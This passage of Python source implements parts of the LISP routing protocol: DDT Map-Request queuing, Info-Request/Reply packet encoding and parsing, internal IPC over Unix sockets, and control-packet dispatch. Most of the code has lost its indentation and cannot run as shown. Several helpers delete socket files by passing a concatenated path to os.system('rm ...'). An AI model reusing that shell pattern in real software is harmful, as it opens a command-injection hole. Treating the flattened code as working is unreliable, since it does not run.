if (self.is_ddt_child()): return("ddt-child")
if (self.is_ms_child()): return("map-server-child")
if (self.is_ms_peer()): return("map-server-peer")
#enddef
def is_ddt_child(self):
if (self.map_server_child): return(False)
if (self.map_server_peer): return(False)
return(True)
#enddef
def is_ms_child(self):
return(self.map_server_child)
#enddef
def is_ms_peer(self):
return(self.map_server_peer)
#enddef
#endclass
#
# This is a Map-Request queue used on a Map-Resolver when waiting for a
# Map-Referral to be returned by a DDT-node or a Map-Server.
#
class lisp_ddt_map_request(object):
def __init__(self, lisp_sockets, packet, eid, group, nonce):
self.uptime = lisp_get_timestamp()
self.lisp_sockets = lisp_sockets
self.packet = packet
self.eid = eid
self.group = group
self.nonce = nonce
self.mr_source = None
self.sport = 0
self.itr = None
self.retry_count = 0
self.send_count = 0
self.retransmit_timer = None
self.last_request_sent_to = None
self.from_pitr = False
self.tried_root = False
self.last_cached_prefix = [None, None]
#enddef
def print_ddt_map_request(self):
lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format( \
"P" if self.from_pitr else "",
red(self.itr.print_address(), False),
green(self.eid.print_address(), False), self.nonce))
#enddef
def queue_map_request(self):
self.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [self])
self.retransmit_timer.start()
lisp_ddt_map_requestQ[str(self.nonce)] = self
#enddef
def dequeue_map_request(self):
self.retransmit_timer.cancel()
if (str(self.nonce) in lisp_ddt_map_requestQ):
lisp_ddt_map_requestQ.pop(str(self.nonce))
#endif
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# -------------------------------------------------------------------
# Type (Action field) Incomplete Referral-set TTL values
# -------------------------------------------------------------------
# 0 NODE-REFERRAL NO YES 1440
#
# 1 MS-REFERRAL NO YES 1440
#
# 2 MS-ACK * * 1440
#
# 3 MS-NOT-REGISTERED * * 1
#
# 4 DELEGATION-HOLE NO NO 15
#
# 5 NOT-AUTHORITATIVE YES NO 0
# -------------------------------------------------------------------
#
LISP_DDT_ACTION_SITE_NOT_FOUND = -2
LISP_DDT_ACTION_NULL = -1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
lisp_map_referral_action_string = [
"node-referral", "ms-referral", "ms-ack", "ms-not-registered",
"delegation-hole", "not-authoritative"]
#
# Info-Request/Reply
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=7 |R| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | EID mask-len | EID-prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Request specific information follows the EID-prefix (which is
# encoded with EID-prefix-AFI set to 0). What is appended is either a
# hostname (AFI=17) or a null AFI=0:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | <hostname--null-terminated> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 0 | <Nothing Follows AFI=0> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Reply specific information following the EID-prefix:
#
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = 16387 | Rsvd1 | Flags |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Type = 7 | Rsvd2 | 4 + n |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# N | MS UDP Port Number | ETR UDP Port Number |
# A +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# T | AFI = x | Global ETR RLOC Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L | AFI = x | MS RLOC Address ... |
# C +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# A | AFI = x | Private ETR RLOC Address ... |
# F +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address 1 ... |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address n ... |
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# This encoding does not use authentication, so we respond to anyone who
# sends an Info-Request. The EID-prefix is encoded with AFI=0.
#
class lisp_info(object):
def __init__(self):
self.info_reply = False
self.nonce = 0
self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.ms_port = 0
self.etr_port = 0
self.rtr_list = []
self.hostname = lisp_hostname
#enddef
def print_info(self):
if (self.info_reply):
req_or_reply = "Info-Reply"
rloc = (", ms-port: {}, etr-port: {}, global-rloc: {}, " + \
"ms-rloc: {}, private-rloc: {}, RTR-list: ").format( \
self.ms_port, self.etr_port,
red(self.global_etr_rloc.print_address_no_iid(), False),
red(self.global_ms_rloc.print_address_no_iid(), False),
red(self.private_etr_rloc.print_address_no_iid(), False))
if (len(self.rtr_list) == 0): rloc += "empty, "
for rtr in self.rtr_list:
rloc += red(rtr.print_address_no_iid(), False) + ", "
#endfor
rloc = rloc[0:-2]
else:
req_or_reply = "Info-Request"
hostname = "<none>" if self.hostname == None else self.hostname
rloc = ", hostname: {}".format(blue(hostname, False))
#endif
lprint("{} -> nonce: 0x{}{}".format(bold(req_or_reply, False),
lisp_hex_string(self.nonce), rloc))
#enddef
def encode(self):
first_long = (LISP_NAT_INFO << 28)
if (self.info_reply): first_long |= (1 << 27)
#
# Encode first-long, nonce, key-id longword, TTL and EID mask-len/
# EID-prefix AFI. There is no auth data field since auth len is 0.
# Zero out key-id, auth-data-len, ttl, reserved, eid-mask-len, and
# eid-prefix-afi.
#
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
packet += struct.pack("III", 0, 0, 0)
#
# Add hostname null terminated string with AFI 17.
#
if (self.info_reply == False):
if (self.hostname == None):
packet += struct.pack("H", 0)
else:
packet += struct.pack("H", socket.htons(LISP_AFI_NAME))
packet += (self.hostname + "\0").encode()
#endif
return(packet)
#endif
#
# If Info-Reply, encode Type 7 LCAF.
#
afi = socket.htons(LISP_AFI_LCAF)
lcaf_type = LISP_LCAF_NAT_TYPE
lcaf_len = socket.htons(16)
ms_port = socket.htons(self.ms_port)
etr_port = socket.htons(self.etr_port)
packet += struct.pack("HHBBHHHH", afi, 0, lcaf_type, 0, lcaf_len,
ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
packet += self.global_etr_rloc.pack_address()
packet += struct.pack("HH", 0, socket.htons(self.private_etr_rloc.afi))
packet += self.private_etr_rloc.pack_address()
if (len(self.rtr_list) == 0): packet += struct.pack("H", 0)
#
# Encode RTR list.
#
for rtr in self.rtr_list:
packet += struct.pack("H", socket.htons(rtr.afi))
packet += rtr.pack_address()
#endfor
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long)
self.nonce = nonce[0]
self.info_reply = first_long & 0x08000000
self.hostname = None
packet = packet[format_size::]
#
# Parse key-id, auth-len, auth-data, and EID-record. We don't support
# any of these. On encode, we set 3 longs worth of 0.
#
packet_format = "HH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# If an LCAF value appears in the key-id field, then this is an
# old style Echo-Reply (that NX-OS implemented).
#
key_id, auth_len = struct.unpack(packet_format, packet[:format_size])
if (auth_len != 0): return(None)
packet = packet[format_size::]
packet_format = "IBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
ttl, rsvd, ml, eid_afi = struct.unpack(packet_format,
packet[:format_size])
if (eid_afi != 0): return(None)
packet = packet[format_size::]
#
# Check if name supplied.
#
if (self.info_reply == False):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[format_size::]
packet, self.hostname = lisp_decode_dist_name(packet)
#endif
#endif
return(orig_packet)
#endif
#
# Process Info-Reply.
#
packet_format = "HHBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, x, lcaf_type, rsvd, lcaf_len, ms_port, etr_port = \
struct.unpack(packet_format, packet[:format_size])
if (socket.ntohs(afi) != LISP_AFI_LCAF): return(None)
self.ms_port = socket.ntohs(ms_port)
self.etr_port = socket.ntohs(etr_port)
packet = packet[format_size::]
#
# Get addresses one AFI at a time.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# Get global ETR RLOC address.
#
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_etr_rloc.afi = socket.ntohs(afi)
packet = self.global_etr_rloc.unpack_address(packet)
if (packet == None): return(None)
self.global_etr_rloc.mask_len = \
self.global_etr_rloc.host_mask_len()
#endif
#
# Get global MS RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_ms_rloc.afi = socket.ntohs(afi)
packet = self.global_ms_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.global_ms_rloc.mask_len = self.global_ms_rloc.host_mask_len()
#endif
#
# Get private ETR RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.private_etr_rloc.afi = socket.ntohs(afi)
packet = self.private_etr_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.private_etr_rloc.mask_len = \
self.private_etr_rloc.host_mask_len()
#endif
#
# Get RTR list if any.
#
while (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi == 0): continue
rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
packet = rtr.unpack_address(packet)
if (packet == None): return(orig_packet)
rtr.mask_len = rtr.host_mask_len()
self.rtr_list.append(rtr)
#endwhile
return(orig_packet)
#enddef
#endclass
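#
# Illustrative sketch (hypothetical helpers, never called): how the first
# longword of an Info-Request/Info-Reply is built and parsed, mirroring
# lisp_info.encode() and lisp_info.decode() above.
#
def _example_info_first_long(info_reply):
    first_long = (LISP_NAT_INFO << 28)
    if (info_reply): first_long |= (1 << 27)
    return(struct.pack("I", socket.htonl(first_long)))
#enddef

def _example_info_is_reply(packet):
    first_long = socket.ntohl(struct.unpack("I", packet[0:4])[0])
    return((first_long & 0x08000000) != 0)
#enddef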
class lisp_nat_info(object):
def __init__(self, addr_str, hostname, port):
self.address = addr_str
self.hostname = hostname
self.port = port
self.uptime = lisp_get_timestamp()
#enddef
def timed_out(self):
elapsed = time.time() - self.uptime
return(elapsed >= (LISP_INFO_INTERVAL * 2))
#enddef
#endclass
class lisp_info_source(object):
def __init__(self, hostname, addr_str, port):
self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
self.port = port
self.uptime = lisp_get_timestamp()
self.nonce = None
self.hostname = hostname
self.no_timeout = False
#enddef
def cache_address_for_info_source(self):
key = self.address.print_address_no_iid() + self.hostname
lisp_info_sources_by_address[key] = self
#enddef
def cache_nonce_for_info_source(self, nonce):
self.nonce = nonce
lisp_info_sources_by_nonce[nonce] = self
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_concat_auth_data
#
# Take each longword and convert it to hex, byte-swapping where needed and
# zero-filling longwords that lead with 0.
#
def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):
if (lisp_is_x86()):
if (auth1 != ""): auth1 = byte_swap_64(auth1)
if (auth2 != ""): auth2 = byte_swap_64(auth2)
if (auth3 != ""):
if (alg_id == LISP_SHA_1_96_ALG_ID): auth3 = socket.ntohl(auth3)
else: auth3 = byte_swap_64(auth3)
#endif
if (auth4 != ""): auth4 = byte_swap_64(auth4)
#endif
if (alg_id == LISP_SHA_1_96_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(8)
auth_data = auth1 + auth2 + auth3
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(16)
auth4 = lisp_hex_string(auth4)
auth4 = auth4.zfill(16)
auth_data = auth1 + auth2 + auth3 + auth4
#endif
return(auth_data)
#enddef
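#
# Illustrative sketch (hypothetical helper, never called): the zfill() calls
# above exist so a longword whose hex string would otherwise drop leading
# zeros keeps its full fixed width, e.g. 0xabc becomes "0000000000000abc"
# (16 hex characters, 64 bits).
#
def _example_zero_fill_longword(value):
    return("{:x}".format(value).zfill(16))
#enddef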
#
# lisp_open_listen_socket
#
# Open either internal socket or network socket. If network socket, it will
# open it with a local address of 0::0 which means the one socket can be
# used for IPv4 or IPv6. This is goodness and reduces the number of threads
# required.
#
def lisp_open_listen_socket(local_addr, port):
if (port.isdigit()):
if (local_addr.find(".") != -1):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (local_addr.find(":") != -1):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
sock.bind((local_addr, int(port)))
else:
name = port
if (os.path.exists(name)):
os.system("rm " + name)
time.sleep(1)
#endif
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(name)
#endif
return(sock)
#enddef
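#
# Usage sketch (hypothetical values, never called): a numeric port string
# opens a network UDP socket while any other string names an internal
# AF_UNIX socket, so the one function covers both listener types.
#
def _example_open_listen_sockets():
    network_socket = lisp_open_listen_socket("0.0.0.0", str(LISP_CTRL_PORT))
    internal_socket = lisp_open_listen_socket("", "lisp-example-socket")
    return([network_socket, internal_socket])
#enddef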
#
# lisp_open_send_socket
#
# Open socket for sending to port 4342.
#
def lisp_open_send_socket(internal_name, afi):
if (internal_name == ""):
if (afi == LISP_AFI_IPV4):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (afi == LISP_AFI_IPV6):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
else:
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(internal_name)
#endif
return(sock)
#enddef
#
# lisp_close_socket
#
# Close network and internal sockets.
#
def lisp_close_socket(sock, internal_name):
sock.close()
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
return
#enddef
#
# lisp_is_running
#
# Test if one of "lisp-itr", "lisp-etr", "lisp-mr", "lisp-ms", "lisp-ddt", or
# "lisp-core" is running.
#
def lisp_is_running(node):
return(True if (os.path.exists(node)) else False)
#enddef
#
# lisp_packet_ipc
#
# Build IPC message for a LISP control packet destined for UDP port 4342. This
# packet goes to the lisp-core process, which then IPCs it to the appropriate
# LISP component process.
#
# Returns a byte string.
#
def lisp_packet_ipc(packet, source, sport):
header = "packet@{}@{}@{}@".format(str(len(packet)), source, str(sport))
return(header.encode() + packet)
#enddef
#
# lisp_control_packet_ipc
#
# Build IPC message for a packet that needs to be sourced from UDP port 4342.
# Always sent by a LISP component process to the lisp-core process.
#
# Returns a byte string.
#
def lisp_control_packet_ipc(packet, source, dest, dport):
header = "control-packet@{}@{}@".format(dest, str(dport))
return(header.encode() + packet)
#enddef
#
# lisp_data_packet_ipc
#
# Build IPC message for a MAC, IPv4, or IPv6 data packet.
#
# Returns a byte string.
#
def lisp_data_packet_ipc(packet, source):
header = "data-packet@{}@{}@@".format(str(len(packet)), source)
return(header.encode() + packet)
#enddef
#
# lisp_command_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have the same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
# Returns a byte string. Variable "ipc" is a string.
#
def lisp_command_ipc(ipc, source):
packet = "command@{}@{}@@".format(len(ipc), source) + ipc
return(packet.encode())
#enddef
#
# lisp_api_ipc
#
# Build IPC message for an API message. Note this API IPC message must
# have the same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
# Returns a byte string. Variable "data" is a string.
#
def lisp_api_ipc(source, data):
packet = "api@" + str(len(data)) + "@" + source + "@@" + data
return(packet.encode())
#enddef
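#
# Worked example (hypothetical command string, helper never called): all of
# the IPC builders above produce "@"-delimited byte strings with the same
# number of fields, for instance:
#
#   lisp_command_ipc("show map-cache", "lisp-itr") returns
#   b"command@14@lisp-itr@@show map-cache"
#
def _example_command_ipc():
    return(lisp_command_ipc("show map-cache", "lisp-itr"))
#enddef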
#
# lisp_ipc
#
# Send IPC message to the internal AF_UNIX socket if the LISP component is
# running. We need to send in segments (1500 or 9000 bytes, see below) since
# the socket interface will not allow larger sends, and socket.setsockopt()
# won't allow us to increase SO_SNDBUF.
#
# Variable "packet" is a byte string; the caller must adhere to this since
# the packet is going out a socket interface (even if internal).
#
def lisp_ipc(packet, send_socket, node):
#
# Can't send an IPC message to a process that is not running.
#
if (lisp_is_running(node) == False):
lprint("Suppress sending IPC to {}".format(node))
return
#endif
ipc_len = 1500 if (packet.find(b"control-packet") == -1) else 9000
offset = 0
length = len(packet)
retry_count = 0
sleep_time = .001
while (length > 0):
segment_len = min(length, ipc_len)
segment = packet[offset:segment_len+offset]
try:
if (type(segment) == str): segment = segment.encode()
send_socket.sendto(segment, node)
lprint("Send IPC {}-out-of-{} byte to {} succeeded".format( \
len(segment), len(packet), node))
retry_count = 0
sleep_time = .001
except socket.error as e:
if (retry_count == 12):
lprint("Giving up on {}, consider it down".format(node))
break
#endif
lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format( \
len(segment), len(packet), node, e))
retry_count += 1
time.sleep(sleep_time)
lprint("Retrying after {} ms ...".format(sleep_time * 1000))
sleep_time *= 2
continue
#endtry
offset += segment_len
length -= segment_len
#endwhile
return
#enddef
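#
# Worked example of the segmentation above (hypothetical sizes): a 4000-byte
# command IPC is not a "control-packet", so ipc_len is 1500 and the message
# goes out as three sendto() calls of 1500, 1500, and 1000 bytes, which the
# receiver stitches back together in lisp_receive_segments() below.
#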
#
# lisp_format_packet
#
# Put whitespace between every 4 bytes of a packet dump. Returns a string,
# not a byte string like the supplied "packet" argument.
#
def lisp_format_packet(packet):
packet = binascii.hexlify(packet)
offset = 0
new = b""
length = len(packet) * 2
while (offset < length):
new += packet[offset:offset+8] + b" "
offset += 8
length -= 4
#endwhile
return(new.decode())
#enddef
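#
# Worked example of the formatting above (hypothetical bytes):
# lisp_format_packet(b"\x12\x34\x56\x78\x9a\xbc") returns "12345678 9abc ",
# i.e. the hex dump grouped 4 bytes (8 hex digits) at a time, with a
# trailing space.
#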
#
# lisp_send
#
# Send packet out.
#
def lisp_send(lisp_sockets, dest, port, packet):
lisp_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]
#
# Remove square brackets. Use an IPv4 socket when address is IPv4, even
# when embedded in ::ffff:<ipv4-address>. This is a special case when
# an RTR sits behind a NAT and is sending a Map-Request. The ECM and
# Map-Request need to use the same ephemeral port and the Map-Reply
# needs to come to the ephemeral listening socket lisp_sockets[0];
#
# Also, on getchip and raspberry-pi OSes, there is no support for IPv6
# sockets, so we need to use the IPv4 embedded address and the IPv4
# socket.
#
address = dest.print_address_no_iid()
if (address.find("::ffff:") != -1 and address.count(".") == 3):
if (lisp_i_am_rtr): lisp_socket = lisp_sockets[0]
if (lisp_socket == None):
lisp_socket = lisp_sockets[0]
address = address.split("::ffff:")[-1]
#endif
#endif
lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
len(packet), bold("to " + address, False), port,
lisp_format_packet(packet)))
#
# Send on socket.
#
try:
lisp_socket.sendto(packet, (address, port))
except socket.error as e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
return
#enddef
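#
# Worked example of the IPv4-embedded check above (hypothetical address):
# for dest "::ffff:10.1.1.1" the string contains "::ffff:" and three dots,
# and "::ffff:10.1.1.1".split("::ffff:")[-1] yields "10.1.1.1", which is
# then sent on the IPv4 socket.
#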
#
# lisp_receive_segments
#
# Process 1500 byte segments if received IPC packet greater than what sockets
# can support.
#
def lisp_receive_segments(lisp_socket, packet, source, total_length):
#
# If the total length is equal to the segment length, we only have one
# segment, which is the whole packet. Return it.
#
segment_len = total_length - len(packet)
if (segment_len == 0): return([True, packet])
lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
total_length, source))
#
# Otherwise, receive each segment and assemble it to return entire packet
# to caller.
#
length = segment_len
while (length > 0):
try: segment = lisp_socket.recvfrom(9000)
except: return([False, None])
segment = segment[0]
#
# The sender gave up and sent a new message that made it to us, so the
# last partial packet must be dropped.
#
seg = segment.decode()
if (seg.find("packet@") == 0):
seg = seg.split("@")
lprint("Received new message ({}-out-of-{}) while receiving " + \
"fragments, old message discarded", len(segment),
seg[1] if len(seg) > 2 else "?")
return([False, segment])
#endif
length -= len(segment)
packet += segment
lprint("Received {}-out-of-{} byte segment from {}".format( \
len(segment), total_length, source))
#endwhile
return([True, packet])
#enddef
#
# lisp_bit_stuff
#
# For every element in the array, insert a 0x40 ("@"). This is a bit-stuffing
# procedure. Only look at array elements with index 2 and above. Caller
# passes a byte string.
#
def lisp_bit_stuff(payload):
lprint("Bit-stuffing, found {} segments".format(len(payload)))
packet = b""
for segment in payload: packet += segment + b"\x40"
return(packet[:-1])
#enddef
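#
# Worked example of the rejoin above (hypothetical segments):
# lisp_bit_stuff([b"ab", b"cd", b"ef"]) returns b"ab@cd@ef", restoring the
# 0x40 bytes that the caller's split("@") removed.
#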
#
# lisp_receive
#
# Wait for packet to come in. This function call will block. For command
# IPCs, we need to loop to assemble all segments.
#
# For an internal socket, the format of a recvfrom() 'packet-data' is:
#
# "command" @ <total-length> @ <source> @ <packet-buffer>
# "packet" @ <total-length> @ <source> @ <command-buffer>
#
# So when an array of length 4 does not exist, we are receiving a fragment.
#
# For an external network socket, the format of a recvfrom() is:
#
# packet_data[0] = <packet-buffer>
# packet_data[1] = [<source>, <port>]
#
def lisp_receive(lisp_socket, internal):
while (True):
#
# Read from socket. Return if we received an error.
#
try: packet_data = lisp_socket.recvfrom(9000)
except: return(["", "", "", ""])
#
# This is a packet received on the network. If it was fragmented at the
# sender, then IP did the fragmenting, so it arrives reassembled into a
# complete datagram on this system.
#
if (internal == False):
packet = packet_data[0]
source = lisp_convert_6to4(packet_data[1][0])
port = packet_data[1][1]
if (port == LISP_DATA_PORT):
do_log = lisp_data_plane_logging
packet_str = lisp_format_packet(packet[0:60]) + " ..."
else:
do_log = True
packet_str = lisp_format_packet(packet)
#endif
if (do_log):
lprint("{} {} bytes {} {}, packet: {}".format(bold("Receive",
False), len(packet), bold("from " + source, False), port,
packet_str))
#endif
return(["packet", source, port, packet])
#endif
#
# This is an IPC message that can be fragmented by lisp-core or the
# sending socket interface.
#
assembled = False
data = packet_data[0]
if (type(data) == str): data = data.encode()
loop = False
while (assembled == False):
data = data.split(b"@")
if (len(data) < 4):
lprint("Possible fragment (length {}), from old message, " + \
"discarding", len(data[0]))
loop = True
break
#endif
opcode = data[0].decode()
try:
total_length = int(data[1])
except:
error_str = bold("Internal packet reassembly error", False)
lprint("{}: {}".format(error_str, packet_data))
loop = True
break
#endtry
source = data[2].decode()
port = data[3].decode()
#
# If any of the data payload has a 0x40 byte (which is "@" in
# ascii), we would confuse the IPC separator with real data.
# So go to the payload and put 0x40 back where split() separated
# the data. This particularly happens with Map-Notify messages
# since the first byte of the message is 0x40.
#
if (len(data) > 5):
packet = lisp_bit_stuff(data[4::])
else:
packet = data[4]
#endif
#
# Check for reassembly. Once reassembled, then we can process one
# large packet.
#
assembled, packet = lisp_receive_segments(lisp_socket, packet,
source, total_length)
if (packet == None): return(["", "", "", ""])
#
# We did not finish assembling a message but the sender sent a new
# one.
#
if (assembled == False):
data = packet
continue
#endif
if (port == ""): port = "no-port"
if (opcode == "command" and lisp_i_am_core == False):
index = packet.find(b" {")
command = packet if index == -1 else packet[:index]
command = ": '" + command.decode() + "'"
else:
command = ""
#endif
lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
len(packet), bold("from " + source, False), port, opcode,
command if (opcode in ["command", "api"]) else ": ... " if \
(opcode == "data-packet") else \
": " + lisp_format_packet(packet)))
#endif
#endwhile
if (loop): continue
return([opcode, source, port, packet])
#endwhile
#enddef
#
# lisp_parse_packet
#
# Parse LISP control message.
#
def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
trigger_flag = False
timestamp = time.time()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return(trigger_flag)
#endif
#
# Store source in internal lisp_address() format.
#
from_ipc = source
if (source.find("lisp") == -1):
s = lisp_address(LISP_AFI_NONE, "", 0, 0)
s.string_to_afi(source)
s.store_address(source)
source = s
#endif
if (header.type == LISP_MAP_REQUEST):
lisp_process_map_request(lisp_sockets, packet, None, 0, source,
udp_sport, False, ttl, timestamp)
elif (header.type == LISP_MAP_REPLY):
lisp_process_map_reply(lisp_sockets, packet, source, ttl, timestamp)
elif (header.type == LISP_MAP_REGISTER):
lisp_process_map_register(lisp_sockets, packet, source, udp_sport)
elif (header.type == LISP_MAP_NOTIFY):
if (from_ipc == "lisp-etr"):
lisp_process_multicast_map_notify(packet, source)
elif (lisp_is_running("lisp-rtr")):
lisp_process_multicast_map_notify(packet, source)
elif (lisp_is_running("lisp-itr")):
lisp_process_unicast_map_notify(lisp_sockets, packet, source)
#endif
elif (header.type == LISP_MAP_NOTIFY_ACK):
lisp_process_map_notify_ack(packet, source)
elif (header.type == LISP_MAP_REFERRAL):
lisp_process_map_referral(lisp_sockets, packet, source)
elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
x, y, trigger_flag = lisp_process_info_reply(source, packet, True)
elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
addr_str = source.print_address_no_iid()
lisp_process_info_request(lisp_sockets, packet, addr_str, udp_sport,
None)
elif (header.type == LISP_ECM):
lisp_process_ecm(lisp_sockets, packet, source, udp_sport)
else:
lprint("Invalid LISP control packet type {}".format(header.type))
#endif
return(trigger_flag)
#enddef
#
# lisp_process_rloc_probe_request
#
# Process Map-Request with RLOC-probe bit set.
#
def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
ttl, timestamp):
p = bold("RLOC-probe", False)
if (lisp_i_am_etr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
ttl, timestamp)
return
#endif
if (lisp_i_am_rtr):
